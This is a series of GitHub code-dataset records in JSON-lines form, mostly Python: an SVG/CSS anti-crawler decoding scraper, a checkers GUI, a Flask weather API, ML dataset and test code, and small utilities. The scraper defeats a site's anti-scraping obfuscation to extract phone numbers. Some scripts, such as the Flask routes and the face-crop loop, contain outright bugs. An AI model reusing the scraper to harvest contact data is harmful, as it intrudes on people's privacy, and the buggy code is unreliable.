get_num_from_class(class_name, font_size, y_locations, texts):\n '''\n 根据class属性获取对应的数字\n :param class_name: class属性值\n :param font_size: 字体大小\n :param y_locations: SVG中所有的text标签的y属性值\n :param texts: SVG中所有的text标签的文本\n :return: 当前class值对应的数字\n '''\n css_x, css_y = get_location_from_css(css_content, class_name) # 获取当前class属性对应的位置\n chosen_y = [y for y in y_locations if y >= css_y][0] # CSS与SVG的y轴坐标关系:获取≥CSS的y轴坐标中的第1个,即最接近的1个\n chosen_text = texts[y_locations.index(chosen_y)] # 被选择的行\n x_location = css_x // font_size # 数字的x轴坐标\n num = chosen_text[x_location] # 定位到x坐标对应的数字\n return num\n\n\ndef crawl():\n '''\n 爬虫主程序:\n 1.获取网页中的所有相关class属性;\n 2.根据class从CSS中获取到相应数字的坐标;\n 3.获取SVG文件中所有的纵坐标和文本值;\n 4.根据CSS纵坐标获取数字所在的行;\n 5.根据CSS横坐标和字体大小获取到所在行的对应数字。\n :return: 拼接后的电话号码\n '''\n # 获取共用信息:字体大小、y轴坐标、文本,执行一次即可\n font_size, y_locations, texts = get_font_size_y_text_from_svg(svg_content)\n\n response = requests.get(url, cookies=cookies)\n dom = BeautifulSoup(response.text, 'lxml')\n d_tags = dom.find('div', class_='media-body').find_all('p')[2].find_all(\n 'd') # 获取class属性为media-body的div标签下的第3个p标签下的所有d标签,定位到电话号码所在位置\n phone_number = [get_num_from_class(d.attrs['class'][0], font_size, y_locations, texts) for d in d_tags]\n return ''.join(phone_number)\n\n\nif __name__ == '__main__':\n phone_number = crawl()\n print(phone_number)\n","repo_name":"corleytd/Hands-on-Crawler-with-Python","sub_path":"08_front_end_anti_crawler/anti_crawler_with_svg_mapping.py","file_name":"anti_crawler_with_svg_mapping.py","file_ext":"py","file_size_in_byte":3946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5173852585","text":"import sys\n\nfrom Board import Board\nfrom Checker import Checker\nfrom Image_Button import PicButton\n\ntry:\n from PyQt5 import QtGui, QtWidgets, QtCore\nexcept Exception as e:\n print('PyQt5 not found: \"{}\"'.format(e),\n file=sys.stderr)\n sys.exit(1)\n\nCELLSIZE = 72\n\n\nclass GUI(QtWidgets.QWidget):\n def __init__(self, board: Board):\n super(GUI, self).__init__()\n self.board = board\n self.init_button_undo()\n self.init_button_redo()\n self.initUI()\n self.show()\n\n def initUI(self):\n self.setGeometry(0, 0, CELLSIZE * 11, CELLSIZE * 8)\n self.load_images(\n [\"white.png\", \"black.png\", \"checkerD.png\", \"checkerW.png\",\n \"QueenD.png\", \"QueenW.png\", \"scoreBoard.png\", \"Menu.png\",\n \"checkerD.png\", \"ButtonL.png\"])\n self.setFixedSize(CELLSIZE * 8, CELLSIZE * 8.5)\n\n def load_images(self, images_names):\n self.images = {name: QtGui.QImage(\"Images\\\\\" + name) for name in\n images_names}\n\n def mousePressEvent(self, q_mouse_event):\n self.board.handle_mouse_click(q_mouse_event.pos(), CELLSIZE)\n self.repaint()\n\n def paintEvent(self, event):\n painter = QtGui.QPainter()\n painter.begin(self)\n self._draw_board(painter)\n painter.end()\n\n def _draw_board(self, painter):\n for x in range(8):\n for y in range(8):\n self._draw_cell(painter, (x, y))\n\n for c in self.board.possible_move_cells:\n self._draw_highlight(painter, c)\n\n for checker in self.board.all_checkers:\n self._draw_checker(painter, checker)\n\n self.draw_panel(painter)\n\n @staticmethod\n def draw_panel(painter: QtGui.QPainter):\n rect = QtCore.QRect(0, CELLSIZE * 8, CELLSIZE * 8, CELLSIZE * 0.5, )\n painter.fillRect(rect, QtGui.QBrush(QtGui.QColor(47, 79, 79)))\n\n @staticmethod\n def _draw_highlight(painter: QtGui.QPainter, coordinates):\n pen = QtGui.QPen(QtGui.QColor(255, 255, 0))\n pen.setWidth(3)\n painter.setPen(pen)\n painter.drawRect(coordinates[0] * CELLSIZE,\n coordinates[1] * CELLSIZE, CELLSIZE, CELLSIZE)\n painter.setPen(QtGui.QColor(0, 0, 0))\n\n def _draw_cell(self, painter: QtGui.QPainter, coords):\n painter.drawImage(coords[0] * CELLSIZE, coords[1] * CELLSIZE,\n self.images[\n \"black.png\" if self.board.is_black(\n *coords) else \"white.png\"])\n\n def _draw_checker(self, painter: QtGui.QPainter, checker: Checker):\n painter.drawImage(checker.x * CELLSIZE + 2, checker.y * CELLSIZE + 2,\n self.images[\n \"checkerD.png\" if checker.is_black\n else \"checkerW.png\"])\n\n def init_button_undo(self):\n pic = QtGui.QPixmap(\".\\\\Images\\\\ButtonD.png\")\n self.undo = PicButton(pic, \"undo\", self)\n self.undo.clicked.connect(self.run_undo)\n self.undo.resize(CELLSIZE * 4, CELLSIZE * 0.5)\n self.undo.move(0, CELLSIZE * 8)\n\n def run_undo(self):\n self.board.make_undo()\n self.repaint()\n\n def init_button_redo(self):\n pic = QtGui.QPixmap(\".\\\\Images\\\\ButtonD.png\")\n self.undo = PicButton(pic, \"redo\", self)\n self.undo.clicked.connect(self.run_redo)\n self.undo.resize(CELLSIZE * 4, CELLSIZE * 0.5)\n self.undo.move(CELLSIZE * 4, CELLSIZE * 8)\n\n def run_redo(self):\n self.board.make_redo()\n self.repaint()\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n gui = GUI(Board())\n\n sys.exit(app.exec_())\n","repo_name":"reindeermur/poddavki","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25400048573","text":"import numpy as np\nimport pandas as pd\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\nimport datetime as dt\n\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///./Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nMeasurement = Base.classes.measurement\nStation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:
    \"\n f\"/api/v1.0/precipitation
    \"\n f\"/api/v1.0/stations
    \"\n f\"/api/v1.0/tobs
    \"\n f\"/api/v1.0/
    \"\n f\"/api/v1.0//\"\n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all precipitation\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n # Create a dictionary from the row data and append to a list of precipitation\n all_precipitation = []\n for date, prcp in results:\n precipitation_dict = {}\n precipitation_dict[\"date\"] = date\n precipitation_dict[\"prcp\"] = prcp\n all_precipitation.append(precipitation_dict)\n\n return jsonify(all_precipitation)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all stations\n results = session.query(Station.name).all()\n\n session.close()\n\n # Convert list of tuples into normal list\n all_stations = list(np.ravel(results))\n\n return jsonify(all_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n # Query all precipitation\n results = session.query(Measurement.date, Measurement.prcp).all()\n\n session.close()\n\n #Define data\n recent_date = session.query(Measurement.date).order_by((Measurement.date).desc()).first()\n year_ago = dt.date(2017, 8, 23) - dt.timedelta(days=365)\n temperature = session.query(Measurement.date, Measurement.tobs).\\\n filter(Measurement.date > year_ago).\\\n filter(Measurement.station == 'USC00519281' ).\\\n order_by(Measurement.date).all()\n\n # Create a dictionary from the row data and append to a list of results in temperature\n temp_results = []\n for date, prcp in results:\n temp_dict = {}\n temp_dict[\"date\"] = date\n temp_dict[\"prcp\"] = prcp\n temp_results.append(temp_dict)\n\n return jsonify(temp_results)\n\n@app.route(\"/api/v1.0/\")\ndef start_date(start):\n\n start_date = datetime.strptime(start, \"%Y-%m-%d\").date()\n sel = [Measurement.date,\n func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n data = session.query(*sel)\n for start_date in data:\n \n if Measurement.date == start_date or start_date < Measurement.date :\n return jsonify(data)\n\n return jsonify({\"error\": f\"No results for date {start_date} not found.\"}), 404\n\n@app.route(\"/api/v1.0//\")\ndef date_range(start, end):\n\n start_date = datetime.strptime(start, \"%Y-%m-%d\").date()\n end_date = datetime.strptime(end, \"%Y-%m-%d\").date()\n sel = [Measurement.date,\n func.min(Measurement.tobs),\n func.max(Measurement.tobs),\n func.avg(Measurement.tobs)]\n data = session.query(*sel)\n for start_date in data:\n \n if Measurement.date == start_date and Measurement.date <= end_date :\n return jsonify(data)\n\n return jsonify({\"error\": f\"No results for date range {start_date}/{end_date} not found.\"}), 404\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"Abigail-GG/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16846141872","text":"\"\"\"Module for the editor menu\"\"\"\n# pylint: disable=import-outside-toplevel\nimport tkinter as tk\n\nfrom shared_gui.base import BaseGUI\nfrom shared_managers.hotkey_manager import HotkeyManager\nfrom shared_utils.functions import Singleton\n\nfrom src.game.game import Game\nfrom src.hud.hud import Hud\nfrom src.utils.constants import DATA_MANAGER, HOTKEY_EDITOR_MENU\n\n\nclass GuiEditorMenuPopup(BaseGUI, metaclass=Singleton):\n \"\"\"\n A class representing a toggle window with hotkey functionality and a menu bar.\n\n Attributes:\n root (tkinter.Tk): The main window of the application.\n is_hidden (bool): A flag indicating whether the window is currently hidden.\n\n Methods:\n __init__(self): Initializes the ToggleWindow instance and runs the main event loop.\n toggle_visibility(self): Toggles the visibility of the window.\n setup_hotkey(self): Sets up the hotkey for toggling window visibility.\n create_menu(self): Creates the menu bar for the application.\n do_nothing(self): A dummy function that does nothing.\n \"\"\"\n\n def __init__(self, parent_root, debug_instantly_show_menu=False):\n \"\"\"\n Initializes a new instance of the ToggleWindow class and runs the main event loop.\n\n Create a fully transparent GUI the size of the entire screen so clicking out of the context menu closes it\n \"\"\"\n super().__init__(gui_type=\"sub\", parent_root=parent_root)\n self.hotkey_manager = HotkeyManager()\n\n # root\n self.debug_instantly_show_menu = debug_instantly_show_menu\n self.set_title(\"Editor Context Menu Popup\")\n self.set_transparency(0.3) # fully transparent makes it less reliable somehow\n self.set_decorations(False)\n self.set_always_on_top(False) # not setting this because it causes prompts to be behind the gui\n\n # Set size to entire screen because set_fullscreen has a 0.1 visible delay ;-)\n screen_width = self.root.winfo_screenwidth()\n screen_height = self.root.winfo_screenheight()\n self.set_window_geometry(f\"{screen_width}x{screen_height}\")\n\n self.data_manager = DATA_MANAGER\n self.game = Game()\n self.hud = Hud()\n\n from src.menu.main import EditorMenuClass\n\n self.my_editor_menu = EditorMenuClass(self)\n self.enable_hotkey()\n\n if self.debug_instantly_show_menu:\n self.show_popup()\n\n def enable_hotkey(self):\n \"\"\"Enable hotkey\"\"\"\n self.hotkey_manager.add_hotkey(HOTKEY_EDITOR_MENU, self.show_popup, suppress=False)\n\n def disable_hotkey(self):\n \"\"\"Disable hotkey\"\"\"\n self.hotkey_manager.remove_hotkey(HOTKEY_EDITOR_MENU) # prevent it from being pressed while menu is open\n\n def show_popup(self):\n \"\"\"Show menu at mouse cursor\"\"\"\n\n # Show gui so context menu can be closed by clicking out & Resize the GUI to the entire screen\n self.maximize() # not setting fullscreen because it disables alt+tab\n\n # get coordinates\n pos_x, pos_y = self.root.winfo_pointerxy()\n\n # show menu\n # self.dev_context_menu = self.my_editor_menu.get_developer_installer_menu(self.root)\n # self.dev_context_menu.post(pos_x, pos_y)\n self.my_editor_menu.create_and_refresh_menu(is_context_menu=True)\n self.show_post_menu(self.my_editor_menu.main_menu, pos_x, pos_y)\n\n # hide gui after context menu closed\n self.hide()\n print(f\"show_editor_menu_popup_gui_at_cursor: end hidden = {self.is_hidden}\")\n\n\ndef main():\n \"\"\"Debug gui class\"\"\"\n # pylint: disable=unused-variable\n root = tk.Tk()\n root.withdraw()\n # app = GuiEditorMenuPopup(root)\n app = GuiEditorMenuPopup(root, debug_instantly_show_menu=True)\n app.show(hide=True)\n # app.show(hide=False)\n # app.show(hidden=True)\n\n input(\"Press enter to exit script...\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"RB490/py-app-l4d-hud-editor","sub_path":"src/gui/popup.py","file_name":"popup.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"24565059127","text":"train_config = \"exp/tts_train_raw_phn_g2pk/config.yaml\"\nmodel_file = \"exp/tts_train_raw_phn_g2pk/284epoch.pth\"\nvoc_config_file = \"voc_exp/hifigan_v2/config_v2.json\"\nvoc_checkpoint_file = \"voc_exp/hifigan_v2/g_00900000\"\ntoken_list = \"token_list/phn_g2pk/tokens.txt\"\n\nfrom espnet2.sato.demo import TextToSpeech\ntts = TextToSpeech(train_config, model_file, voc_config_file, voc_checkpoint_file, token_list)\nalpha = 1.0\nf0_shift = None\ntts(\"문학작품 낭송 음성데이터는 자연스럽게 문학작품을 낭송하는 인공지능 기술 개발을 위한 음성 데이터입니다.\", speed_control_alpha=alpha, f0_shift=f0_shift)\n","repo_name":"imdanboy/tts_hackaton_2021","sub_path":"egs2/sato/tts1/demo_tts.py","file_name":"demo_tts.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39785496071","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Global variables\nimg_path = '/home/user/class/mc906/p4/dataset/data/image/origin'\n\nannotation_file = '/home/user/class/mc906/p4/dataset/data/label/label.lst'\n\nf = open(os.path.join(annotation_file), \"r\")\nlabels = f.readlines()\n\nemotion_dict = {}\nfor line in labels:\n split = line.split(' ', 1)\n emotion_dict[split[0]] = split[1]\n\nfor original in os.listdir(img_path):\n if original.endswith(\".jpg\"):\n # Read image\n image = cv2.imread(os.path.join(img_path, original))\n \n # Find label for image\n if original in emotion_dict:\n # Read face coordinates\n top_x, top_y, bot_y, bot_x = emotion_dict[name].split(' ')[1:5]\n \n top_x = int(top_x)\n top_y = int(top_y)\n bot_y = int(bot_y)\n bot_x = int(bot_x)\n\n # Crop face\n crop = image[top_x:bot_x, top_y:bot_y]\n\n # Save cropped face\n name = 'fcrop_'+original\n cv2.imwrite(name, crop)\n","repo_name":"rlamarques/face-emotion-detection","sub_path":"face-crop.py","file_name":"face-crop.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4314806463","text":"import os\nfrom PIL import Image\nfrom torch.utils.data import Dataset\nimport torchvision.transforms as transform\nimport numpy as np\n\nclass CarvanaDataset(Dataset):\n\n def __init__(self, image_dir, mask_dir):\n self.image_dir = image_dir\n self.mask_dir = mask_dir\n self.transform = transform.Compose([transform.ToTensor(),\n transform.Resize((160, 240))])\n\n self.images = os.listdir(image_dir) # image_dir 경로에 있는 모든 file의 이름을 가져온다. (path X file name O)\n\n def __len__(self):\n return len(self.images)\n\n def __getitem__(self, idx):\n img_path = os.path.join(self.image_dir, self.images[idx]) # Rename as \"path + file name\" !\n mask_path = os.path.join(self.mask_dir, self.images[idx].replace(\".jpg\", \"_mask.gif\")) # Rename as \"path + file name\" !\n '''\n _mask.gif 확장자 -> jpg로 바꾸기 , path + filename 결합하기 동시에 수행 \n '''\n # RGB Image로 열어서 numpy type으로 type casting\n image = np.array(Image.open(img_path).convert(\"RGB\")) # 확실히 하기 위해 RGB Image로 열도록 명시\n mask = np.array(Image.open(mask_path).convert(\"L\"), dtype=np.float32) # L : gray Scale\n\n image = self.transform(image)\n mask = self.transform(mask)\n\n # 0.0 ~ 255.0\n mask[mask == 255.0] = 1.0 # Sigmoid 를 마지막 Activation function으로 사용할 것이기 때문에 1의 값으로 맞추어주자.\n\n return image, mask\n\n\n","repo_name":"dldnxks12/A.I","sub_path":"Deep Learning/7. Segmentation-Semantic/U-Net/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42980177660","text":"import math\nfrom functools import reduce\nfrom unittest import TestCase, skip\n\nfrom torch.utils.data import DataLoader\n\nfrom models.LaplacianFrequencyRepresentation import LaplacianFrequencyRepresentation\nfrom models.ASDN import ASDN\n\nimport torch\nimport torch.nn as nn\n\nfrom tests.pytorch_test import PyTorchTest\nfrom tests.util_for_testing import RandomTensorDataset\n\n\n@skip(\"Done and it's working. Skipped because it's expensive.\")\nclass TestASDN(PyTorchTest):\n def before(self):\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print(\"Current device: \", self.device)\n\n # batch size 8 use 5.5GB\n self.loader = DataLoader(RandomTensorDataset(), batch_size=8)\n self.asdn = ASDN(3, lfr=LaplacianFrequencyRepresentation(1, 2, 11)).to(self.device)\n\n def after(self):\n self.device = None\n self.loader = None\n self.asdn = None\n\n def test_forward(self):\n scale = 1.3674\n\n leveliminus1, leveli = self.lfr.get_for(scale=scale)\n\n start = torch.cuda.Event(enable_timing=True)\n end = torch.cuda.Event(enable_timing=True)\n\n self.asdn.train()\n\n for index, batch in enumerate(self.loader):\n batch = batch.to(self.device)\n\n start.record()\n outputi = self.asdn(batch, irb_index=leveli.index)\n end.record()\n\n torch.cuda.synchronize()\n print(\"=\" * 3, index, \"=\" * 3)\n print(f\"Time passed (s): {start.elapsed_time(end) / 1000:.2f}\")\n\n print(outputi.size())\n\n\nclass TestASDN(TestCase):\n\n def test_test_step(self):\n def compute_last_patch_size(scale, patch_size):\n scales = lfr.get_scales(scale)\n scales = [lfr.get_for(scale)[-1].scale for scale in scales]\n last_patch_size = patch_size\n for scale in scales:\n last_patch_size = last_patch_size * scale\n return math.floor(last_patch_size)\n\n lfr = LaplacianFrequencyRepresentation(1, 2, 11)\n model = ASDN(3, lfr).cuda()\n\n patch = torch.rand(8, 3, 48, 48).cuda()\n print(patch.size())\n print(\"x2\", patch.size(-1) * 2)\n print(\"x3.5\", patch.size(-1) * 3.5)\n\n scale = 2\n out = model.test_step(scale, patch)\n self.assertEqual(out.size(-1), compute_last_patch_size(scale, patch.size(-1)))\n\n scale = 3.5\n out = model.test_step(scale, patch)\n self.assertEqual(out.size(-1), compute_last_patch_size(scale, patch.size(-1)))\n","repo_name":"alessandrodicosola/SuperSampling","sub_path":"tests/test_ASDN.py","file_name":"test_ASDN.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"34993672573","text":"import pandas as pd\nimport os\nimport json\nimport logging\nimport sys\nlogging.basicConfig(filename = 'logs.log')\n\n#This function will create customer_level_features.csv\ndef customer_level_features(read_from_train, read_from_test, write_to):\n customer_level_features = ['customer_number',\n 'avg_of_all_delays',\n 'avg_of_invoices_closed',\n 'payment_count_quarter_q1',\n 'payment_count_quarter_q2',\n 'payment_count_quarter_q3',\n 'payment_count_quarter_q4',\n 'invoice_count_quarter_q1',\n 'invoice_count_quarter_q2',\n 'invoice_count_quarter_q3',\n 'invoice_count_quarter_q4',\n 'L1_perc',\n 'L2_perc',\n 'L3_perc',\n 'M_perc',\n 'H_perc'\n ]\n\n data = pd.read_csv(r''+read_from_train)\n data2 = pd.read_csv(r''+read_from_test)\n\n customer_level_dataset=pd.DataFrame()\n dataset = data[customer_level_features].append(data2[customer_level_features], ignore_index=True)\n for i in dataset['customer_number'].unique():\n customer_level_dataset = customer_level_dataset.append(dataset[dataset['customer_number'] == i][customer_level_features].iloc[0], ignore_index=True)\n\n customer_level_dataset.rename(columns={'customer_number':'object_value','H_perc':'H','L1_perc':'L1','L2_perc':'L2','L3_perc':'L3','M_perc':'M'},inplace=True)\n if customer_level_dataset['object_value'].dtype==float:\n customer_level_dataset['object_value'] = customer_level_dataset['object_value'].astype('int')\n customer_level_dataset.to_csv(write_to,index=False)\n logging.warning('Customer Level Features Created.')\n\n\ndef subsets_json(subset):\n list=[]\n for invoice_number in subset['invoice_number']:\n invoice=subset[subset['invoice_number']==invoice_number]\n list.append({\"invoice_amount\":invoice['invoice_amount'].values[0],\"invoice_number\":str(invoice_number).split('.')[0],\"invoice_date\":invoice['invoice_date'].values[0]})\n return list\n\n\ndef raw_json_creation(read_from, read_from_subsets,write_to):\n\n data = pd.read_csv(r''+read_from) # raw csv\n subsets_predictions = pd.read_csv(read_from_subsets) # predictions\n\n temp = data.groupby('payment_id').agg({'customer_number':'nunique'}).reset_index()\n invalid_payments = temp[temp['customer_number'] > 1]['payment_id'].unique()\n print(invalid_payments)\n data = data[~data['payment_id'].isin(invalid_payments)]\n\n top_header = data.groupby('payment_id')[['customer_number','unique_invoice_count','payment_amount','payment_date']].max().reset_index()\n payments = []\n predictions = pd.DataFrame()\n\n for index, row in top_header.iterrows():\n if row['payment_id'] not in subsets_predictions['payment_id'].unique():\n print('payment' + str(row['payment_id']) + 'not found')\n continue\n\n subset_dict = {}\n subset_dict[\"customer_number\"] = str(row['customer_number'])\n subset_dict[\"unique_invoice_count\"] = row['unique_invoice_count']\n subset_dict[\"payment_amount\"] = row['payment_amount']\n subset_dict[\"primaryKey\"]=int(row['payment_id'])\n subset_dict[\"payment_date\"]=str(row['payment_date'])\n subset_dict[\"items\"] = []\n items = []\n subsets = data[data['payment_id']==row['payment_id']]\n for subset_number in subsets['subset_number'].unique():\n abc = len(subsets_predictions[(subsets_predictions['payment_id']==row['payment_id']) & (subsets_predictions['subset_number']==subset_number)])\n if abc == 0:\n # print('subset ' + str(subset_number) + ' not found for payment ' + str(row['payment_id']))\n continue\n items.append({\"subsetId\":int(subset_number),\"subset\":subsets_json(subsets[subsets['subset_number']==subset_number])})\n predictions=predictions.append(subsets_predictions[(subsets_predictions['payment_id']==row['payment_id']) & (subsets_predictions['subset_number']==subset_number)],ignore_index=True)\n subset_dict['items']=items\n payments.append(subset_dict)\n final_json={\"data\":payments}\n write_to_ = write_to+'raw_data_json.json'\n with open(write_to_, 'w') as fp:\n json.dump(final_json, fp)\n predictions.rename(columns={'output':'actual','predictions':'output','H_perc':'H','L1_perc':'L1','L2_perc':'L2','L3_perc':'L3','M_perc':'M','pred_proba_0':'probability(0)','pred_proba_1':'probability(1)'},inplace=True)\n predictions.to_csv(write_to+'raw_predictions.csv',index=False)\n\n\n#This function will divide the data to 70% train and 30% test\ndef rivana_testing(read_from, testing_data_path, write_to_raw_csv):\n raw_fields = ['customer_number','payment_id','payment_amount','payment_date','invoice_number','invoice_amount','invoice_date','subset_number','unique_invoice_count','output']\n raw_csv = pd.DataFrame()\n testing_data = pd.read_csv(testing_data_path)\n testing_payment_ids = testing_data['payment_id'].unique()\n for i in os.listdir(read_from):\n dataset = pd.read_csv(r''+read_from+'/' + str(i), sep=',', index_col=0)\n dataset['invoice_number']=dataset['invoice']\n dataset['invoice_amount']=dataset['amount']\n dataset=dataset[dataset['payment_id'].isin(testing_payment_ids)]\n raw_csv=raw_csv.append(dataset[raw_fields],ignore_index=True)\n raw_csv.to_csv(write_to_raw_csv)\n\n\nif __name__ == '__main__':\n acct_id = str(sys.argv[1])\n #path = \"/root/accounts\"\n path = str(sys.argv[2])\n read_from = path+'/account_'+acct_id+'/customer_subsets_features'\n testing_data_path = path+\"/account_\"+acct_id+\"/train_test_splitted/test_30.csv\"\n write_to_raw_csv = path+\"/account_\"+acct_id+\"/rivana_test/raw_data.csv\"\n\n \n # This function will generate all the Rivana Testing Files\n rivana_testing(read_from, testing_data_path, write_to_raw_csv)\n\n read_from = write_to_raw_csv\n write_to = path+\"/account_\"+acct_id+\"/rivana_test/\"\n read_from_subsets = path+\"/account_\"+acct_id+\"/predictions/predictions.csv\"\n # This function will create JSON input files\n raw_json_creation(read_from, read_from_subsets, write_to)\n\n # This will generate aggregate file of customer level features\n read_from_train = path+\"/account_\"+acct_id+\"/train_test_splitted/train_70.csv\"\n read_from_test = path+\"/account_\"+acct_id+\"/train_test_splitted/test_30.csv\"\n write_to = path+'/account_'+acct_id+'/rivana_test/customer_level_features.csv'\n\n #This will generate aggregate file of customer level features\n customer_level_features(read_from_train, read_from_test,write_to)\n","repo_name":"rohansasmal123/continuous-testing","sub_path":"generate_Test_Files.py","file_name":"generate_Test_Files.py","file_ext":"py","file_size_in_byte":6911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26279433784","text":"import ping3\r\nimport sys\r\n\r\ndef ping_server(ip_address):\r\n try:\r\n response_time = ping3.ping(ip_address)\r\n if response_time is not None:\r\n print(f\"Ping to {ip_address} successful. Response time: {response_time:.2f} ms\")\r\n else:\r\n print(f\"Ping to {ip_address} failed.\")\r\n except PermissionError:\r\n print(\"Ping failed. Please run the script as a superuser (root/Administrator).\")\r\n except ValueError as ve:\r\n print(f\"Error: {ve}\")\r\n except Exception as e:\r\n print(f\"An error occurred: {e}\")\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) != 2:\r\n print(\"Usage: python ping_server.py \")\r\n sys.exit(1)\r\n\r\n ip_address = sys.argv[1]\r\n ping_server(ip_address)\r\n","repo_name":"hvamruth/Myrepo","sub_path":"Code/python/ping_server.py","file_name":"ping_server.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"677116681","text":"import math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'arrayManipulation' function below.\n# https://www.hackerrank.com/challenges/crush/problem\n#\n# The function is expected to return a LONG_INTEGER.\n# The function accepts following parameters:\n# 1. INTEGER n\n# 2. 2D_INTEGER_ARRAY queries\n#\n\ndef arrayManipulation(n, queries):\n \n arr = [0] * n\n for q in queries :\n arr[q[0]-1] += q[2]\n if (q[1] < n) :\n arr[q[1]] -= q[2]\n\n max_val = arr[0]\n counter_val = 0\n for val in arr :\n counter_val += val\n if max_val < counter_val :\n max_val = counter_val\n return max_val\n\nif __name__ == '__main__':\n #fptr = open('OUTPUT/OUT', 'w')\n frptr = open('OUTPUT/IN', 'r')\n fptr = open('OUTPUT/OUT', 'w')\n\n first_multiple_input = frptr.readline().rstrip().split()\n\n n = int(first_multiple_input[0])\n\n m = int(first_multiple_input[1])\n\n queries = []\n\n for _ in range(m):\n queries.append(list(map(int, frptr.readline().rstrip().split())))\n\n result = arrayManipulation(n, queries)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"yuvSid/interviewPrepare","sub_path":"python/array_manipulation.py","file_name":"array_manipulation.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"69820315921","text":"import sys\n\nfrom PyQt6.QtWidgets import QStatusBar\nfrom PySide6.QtCore import QSize\nfrom PySide6 import QtWidgets, QtCore, QtGui\nfrom PySide6.QtGui import QAction\nfrom PySide6.QtWidgets import QApplication, QMessageBox, QApplication, QMainWindow, QPushButton, QLabel, QToolBar\nfrom PySide6.QtCore import Qt\nimport qtawesome as qta\n\nwindow_title = \"Screen shot snipping tool\" # Window title\n\nwindow_width = 500 # Window width\nwindow_height = 350 # Window height\nwindow_size = QSize(window_width, window_height) # Window size\n\n\n# Subclass QMainWindow to customize your application's main window\nclass SnippingWidgetTool(QMainWindow):\n def __init__(self):\n super().__init__() # Call the inherited classes __init__ method\n self.setWindowTitle(window_title) # Set the window's title\n self.setFixedSize(window_size) # Set the window's size\n self.counter = 0\n\n # Initialize elements\n self.toolbar = QToolBar(\"My toolbar\")\n self.text = QLabel(\"This is a text\", self)\n\n # Call functions\n self.information_text() # Call the information text method\n self.snippet_button() # Call the screenshot button method\n\n def snippet_button(self):\n # Screenshot button\n self.button = QPushButton(\"Snip Tool\", self) # Create a button in the window || Initialize the button\n # -- Clickable actions --\n self.button.clicked.connect(self.the_button_was_clicked) # Connect the button to the function\n # --- Reizing the button ---\n # Center the button position at the top of the window relative to the window size\n self.button.move(int((window_width / 2) - window_width / 2),\n int((window_height / 2) - window_height / 2)+180) # Set the button's position\n self.button.resize(window_width, 50) # Set the button's size\n\n def increase_counter(self):\n self.counter += 1\n print(f' Counter is now: {self.counter}')\n\n def the_button_was_clicked(self):\n self.increase_counter()\n self.button.setText(f\"You have clicked on me {self.counter}\") # Change the button's text\n self.text.setText(f\"You have clicked on me {self.counter}\") # Change the button's text\n self.setWindowTitle(f\"Clicked {self.counter} times\") # Change the window's title\n\n def information_text(self):\n self.text.setAlignment(Qt.AlignmentFlag.AlignHCenter | Qt\n .AlignmentFlag.AlignVCenter)\n self.setCentralWidget(self.text)\n\n\n\n\n\n\ndef main():\n app = QApplication(sys.argv) # Create an instance of QApplication\n window = SnippingWidgetTool() # Instantiate your custom class\n window.show() # IMPORTANT!!!!! Windows are hidden by default.\n app.exec() # Start the application\n\n\nif __name__ == '__main__': # Run the application\n main() # Run the main 